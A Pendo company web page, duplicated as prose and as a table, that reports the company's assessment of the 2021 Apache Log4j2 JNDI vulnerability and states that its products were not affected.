Pendo Response to Industry Security Incidents
Overview
When third party security and technology companies disclose breaches and other security events, Pendo often receives questions about whether and how those incidents affect us. In line with our Core Values of Be Direct and Transparent and Maniacal Focus on the Customer, we want to make it easier for our customers to gain access to information about whether widely publicized breaches and events affect Pendo products. We are constantly reviewing and analyzing industry security incidents and will update this page when new material incidents arise and information related to Pendo is available. If Pendo customers are impacted by any third party security breach or event, in addition to this page, we will notify relevant customers in accordance with our Incident Response Process.
Incidents
Date
Organization/Product
Incident Overview
Pendo Impact
First Reported:
December 13, 2021
Latest Update:
December 23, 2021
Apache log4j2
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. As a result, an attacker who can control log messages or log message parameters on systems that use log4j could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
12/23/2021 Update:
We are continuing to review information provided by our vendors and are implementing recommended changes to third party services when needed.
Out of an abundance of caution, we are also reviewing our logs and systems for potential indicators of compromise. At present, we have not seen evidence that Pendo products have been impacted.
12/13/2021:
Pendo products have not been impacted by this issue.
Our Security and Engineering teams have performed a thorough investigation and determined that we are not using the log4j library in our code base.
We are also in contact with our key service providers regarding any potential impact that they may have experienced. Given the critical nature of the log4j vulnerability, we are continuing to assess new information as it becomes available and will provide updates here as needed.
In addition to the list above, there may be other security incidents that we are reviewing. Because security incident details provide sensitive information that could be used maliciously or are not heavily pervasive, we are unable to publish information about every incident we review.
Footnote: In the interest of giving credit where credit is due, we’d like to thank our friends at Code42 for providing an excellent example of how to proactively share information with the community.
When third party security and technology companies disclose breaches and other security events, Pendo often receives questions about whether and how those incidents affect us. In line with our Core Values of Be Direct and Transparent and Maniacal Focus on the Customer, we want to make it easier for our customers to gain access to information about whether widely publicized breaches and events affect Pendo products. We are constantly reviewing and analyzing industry security incidents and will update this page when new material incidents arise and information related to Pendo is available. If Pendo customers are impacted by any third party security breach or event, in addition to this page, we will notify relevant customers in accordance with our Incident Response Process.
| Date | Organization/Product | Incident Overview | Pendo Impact |
|---|---|---|---|
|
First Reported: Latest Update: |
Apache log4j2 | Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. As a result, an attacker who can control log messages or log message parameters on systems that use log4j could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. |
12/23/2021 Update: Out of an abundance of caution, we are also reviewing our logs and systems for potential indicators of compromise. At present, we have not seen evidence that Pendo products have been impacted. 12/13/2021: Our Security and Engineering teams have performed a thorough investigation and determined that we are not using the log4j library in our code base. We are also in contact with our key service providers regarding any potential impact that they may have experienced. Given the critical nature of the log4j vulnerability, we are continuing to assess new information as it becomes available and will provide updates here as needed. |
In addition to the list above, there may be other security incidents that we are reviewing. Because security incident details provide sensitive information that could be used maliciously or are not heavily pervasive, we are unable to publish information about every incident we review.
Footnote: In the interest of giving credit where credit is due, we’d like to thank our friends at Code42 for providing an excellent example of how to proactively share information with the community.